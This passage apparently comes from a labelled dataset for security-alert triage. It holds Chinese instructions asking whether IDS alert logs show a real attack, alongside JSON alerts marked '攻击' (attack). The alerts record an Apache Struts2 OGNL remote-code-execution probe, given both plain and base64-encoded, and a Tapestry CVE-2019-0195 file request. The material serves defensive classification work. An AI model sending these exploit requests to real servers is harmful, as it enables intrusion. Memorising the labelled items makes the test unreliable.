"att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/assets/something/services/AppModule.class", "src_mac": "00:94:a1:5e:6e:87", "file_name": "AppModule.class", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /assets/something/services/AppModule.class HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569991-Apache Tapestry安全漏洞(CVE-2019-0195)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12524", "h_url": "/assets/something/services/AppModule.class"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688185", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688185, "vuln_harm": "成功利用此漏洞,可导致服务器被完全控制,成为肉鸡,危害极大。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dport": 30001, "vuln_name": "Struts代码执行漏洞(机器学习)", "rsp_status": 0, "code_language": "", "solution": "升级系统版本,及时更新。", "hit_start": 0, "detail_info": "Apache Struts可能因为配置问题导致远程代码执行。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Apache Struts可能因为配置问题导致远程代码执行。", "public_date": "2020-11-25 19:42:36", "sport": 12503}, "detail_info": "Apache Struts可能因为配置问题导致远程代码执行。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:25", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Struts代码执行漏洞(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "25ec28d6549bca7c4356291e491ae013", "xff": "", "vuln_desc": "Apache Struts可能因为配置问题导致远程代码执行。", "attack_chain": "0x02020000", "vuln_harm": "成功利用此漏洞,可导致服务器被完全控制,成为肉鸡,危害极大。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688165", "code_language": "", "public_date": "2020-11-25 19:42:36", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b68", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Struts代码执行漏洞(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "升级系统版本,及时更新。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/bWV0aG9kOiUyM19tZW1iZXJBY2Nlc3MlM2RAb2dubC5PZ25sQ29udGV4dEBERUZBVUxUX01FTUJFUl9BQ0NFU1MsJTIzY29udGV4dFslMjNwYXJhbWV0ZXJzLm9ialswXV0uZ2V0V3JpdGVyKCkucHJpbnQoNDAyNzYqNDI0NzYpLDE/JTIzeHg6JTIzcmVxdWVzdC50b1N0cmluZyZvYmo9Y29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_ab85575f1b1429154b67480427c33027", "access_time": "2024-11-27 14:16:25", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "obj": "com.opensymphony.xwork2.dispatcher.HttpServletResponse", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569448-Struts代码执行漏洞(机器学习)", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"proto\": \"TCP\"}}", "sport": "12503", "h_url": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688184", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688184, "vuln_harm": "", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 66, "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dport": 30001, "vuln_name": "Apache Struts 2 任意代码执行漏洞", "rsp_status": 0, "code_language": "其他", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\nhttps://struts.apache.org/docs/s2-032.html", "hit_start": 46, "detail_info": "Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。\nApache Struts 2中存在安全漏洞。当程序启用Dynamic Method Invocation时,远程攻击者可借助method:前缀利用该漏洞在服务器端执行任意代码。以下版本受到影响:Apache Struts 2.3.20.2之前2.x版本,2.3.24.2之前2.3.24.x版本,2.3.28.1之前2.3.28.x版本。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。\nApache Struts 2中存在安全漏洞。当程序启用Dynamic Method Invocation时,远程攻击者可借助method:前缀利用该漏洞在服务器端执行任意代码。以下版本受到影响:Apache Struts 2.3.20.2之前2.x版本,2.3.24.2之前2.3.24.x版本,2.3.28.1之前2.3.28.x版本。", "public_date": "2018-11-14 00:00:00", "sport": 12503}, "detail_info": "Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。\nApache Struts 2中存在安全漏洞。当程序启用Dynamic Method Invocation时,远程攻击者可借助method:前缀利用该漏洞在服务器端执行任意代码。以下版本受到影响:Apache Struts 2.3.20.2之前2.x版本,2.3.24.2之前2.3.24.x版本,2.3.28.1之前2.3.28.x版本。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:24", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Apache Struts 2 任意代码执行漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "9376766f8ca720c18a4621023e1394db", "xff": "", "vuln_desc": "Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。\nApache Struts 2中存在安全漏洞。当程序启用Dynamic Method Invocation时,远程攻击者可借助method:前缀利用该漏洞在服务器端执行任意代码。以下版本受到影响:Apache Struts 2.3.20.2之前2.x版本,2.3.24.2之前2.3.24.x版本,2.3.28.1之前2.3.28.x版本。", "attack_chain": "0x02010000", "vuln_harm": "", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688165", "code_language": "其他", "public_date": "2018-11-14 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "66", "h_proto_version": "HTTP/1.1", "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1000122c", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Apache Struts 2 任意代码执行漏洞", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:\nhttps://struts.apache.org/docs/s2-032.html", "hit_start": "46", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/bWV0aG9kOiUyM19tZW1iZXJBY2Nlc3MlM2RAb2dubC5PZ25sQ29udGV4dEBERUZBVUxUX01FTUJFUl9BQ0NFU1MsJTIzY29udGV4dFslMjNwYXJhbWV0ZXJzLm9ialswXV0uZ2V0V3JpdGVyKCkucHJpbnQoNDAyNzYqNDI0NzYpLDE/JTIzeHg6JTIzcmVxdWVzdC50b1N0cmluZyZvYmo9Y29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_1d7df90270ac937c9cc850c187d62bad", "access_time": "2024-11-27 14:16:24", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "obj": "com.opensymphony.xwork2.dispatcher.HttpServletResponse", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440108-Apache Struts 2 任意代码执行漏洞", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12503", "h_url": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688184", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688184, "vuln_harm": "执行任意代码,极大危害主机安全。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 44, "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dport": 30001, "vuln_name": "Apache Struts 2 安全漏洞", "rsp_status": 0, "code_language": "其他", "solution": "时刻关注厂商主页安全动态。及时添加补丁。", "hit_start": 24, "detail_info": "Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。", "public_date": "2018-11-14 00:00:00", "sport": 12503}, "detail_info": "Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:24", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Apache Struts 2 安全漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "bea4a4679ddc15f5fc0aa9f844a925fd", "xff": "", "vuln_desc": "Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。", "attack_chain": "0x02010000", "vuln_harm": "执行任意代码,极大危害主机安全。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688165", "code_language": "其他", "public_date": "2018-11-14 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "44", "h_proto_version": "HTTP/1.1", "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001251", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Apache Struts 2 安全漏洞", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "时刻关注厂商主页安全动态。及时添加补丁。", "hit_start": "24", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/bWV0aG9kOiUyM19tZW1iZXJBY2Nlc3MlM2RAb2dubC5PZ25sQ29udGV4dEBERUZBVUxUX01FTUJFUl9BQ0NFU1MsJTIzY29udGV4dFslMjNwYXJhbWV0ZXJzLm9ialswXV0uZ2V0V3JpdGVyKCkucHJpbnQoNDAyNzYqNDI0NzYpLDE/JTIzeHg6JTIzcmVxdWVzdC50b1N0cmluZyZvYmo9Y29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_ee8df4a68a74553234d1d78c31dbe2cb", "access_time": "2024-11-27 14:16:24", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16030000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "obj": "com.opensymphony.xwork2.dispatcher.HttpServletResponse", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440145-Apache Struts 2 安全漏洞", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"proto\": \"TCP\"}, \"0x100406\": {\"parent_id\": \"0x100400\", \"type\": \"中间件名称\", \"name\": \"apache\", \"parent_name\": \"中间件安全\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12503", "h_url": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688184", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688184, "vuln_harm": "通常情况下,远程代码执行漏洞包括:\r\n\r\n(1)URL提交,主要是GET、POST请求;\r\n\r\n(2)构造特定的HTTP请求;\r\n\r\n(3)利用一些框架底层的安全漏洞,执行任意代码;\r\n\r\n远程代码执行漏洞可带来如下危害:\r\n\r\n(1)攻击者可通过此漏洞创建恶意脚本文件,对服务器的正常运行造成安全威胁;\r\n\r\n(2)黑客可在服务器上执行任意脚本命令,写入后门,从而入侵服务器,获取服务器的管理员权限,危害巨大。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 26, "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dport": 30001, "vuln_name": "Java框架通用代码执行攻击", "rsp_status": 0, "code_language": "Java", "solution": "解决远程代码执行问题的关键是对所有可能来自用户输入的数据进行严格的检查、对服务器的安全配置使用最小权限原则。 通常使用的方案有:\r\n\r\n(1)对输入的数据中特殊字符进行转义处理,或编码转换\r\n\r\n(2)对当前web中间件权限降权处理\r\n\r\n(3)若应用程序使用第三方开源框架,将框架版本升级至最新版;", "hit_start": 6, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在JavaWeb中代码执行以Struts2、Weblogic、Spring最为知名,恶意攻击者只需要构造出OGNL、SPEL表达式或者反序列化代码就可以执行任意代码命令。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在JavaWeb中代码执行以Struts2、Weblogic、Spring最为知名,恶意攻击者只需要构造出OGNL、SPEL表达式或者反序列化代码就可以执行任意代码命令。", "public_date": "2018-07-16 16:38:08", "sport": 12503}, "detail_info": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在JavaWeb中代码执行以Struts2、Weblogic、Spring最为知名,恶意攻击者只需要构造出OGNL、SPEL表达式或者反序列化代码就可以执行任意代码命令。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:24", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Java框架通用代码执行攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "9a43a3599687ae8b5a56edcc50d47afe", "xff": "", "vuln_desc": "远程代码执行漏洞通常由于开发人员编写程序,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造代码语句提交,并交由服务器端WEB程序执行。在JavaWeb中代码执行以Struts2、Weblogic、Spring最为知名,恶意攻击者只需要构造出OGNL、SPEL表达式或者反序列化代码就可以执行任意代码命令。", "attack_chain": "0x02020000", "vuln_harm": "通常情况下,远程代码执行漏洞包括:\r\n\r\n(1)URL提交,主要是GET、POST请求;\r\n\r\n(2)构造特定的HTTP请求;\r\n\r\n(3)利用一些框架底层的安全漏洞,执行任意代码;\r\n\r\n远程代码执行漏洞可带来如下危害:\r\n\r\n(1)攻击者可通过此漏洞创建恶意脚本文件,对服务器的正常运行造成安全威胁;\r\n\r\n(2)黑客可在服务器上执行任意脚本命令,写入后门,从而入侵服务器,获取服务器的管理员权限,危害巨大。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688165", "code_language": "Java", "public_date": "2018-07-16 16:38:08", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "26", "h_proto_version": "HTTP/1.1", "uri": "/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40276*42476),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020537", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Java框架通用代码执行攻击", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "解决远程代码执行问题的关键是对所有可能来自用户输入的数据进行严格的检查、对服务器的安全配置使用最小权限原则。 通常使用的方案有:\r\n\r\n(1)对输入的数据中特殊字符进行转义处理,或编码转换\r\n\r\n(2)对当前web中间件权限降权处理\r\n\r\n(3)若应用程序使用第三方开源框架,将框架版本升级至最新版;", "hit_start": "6", "skyeye_id": "", "payload": {"req_header": 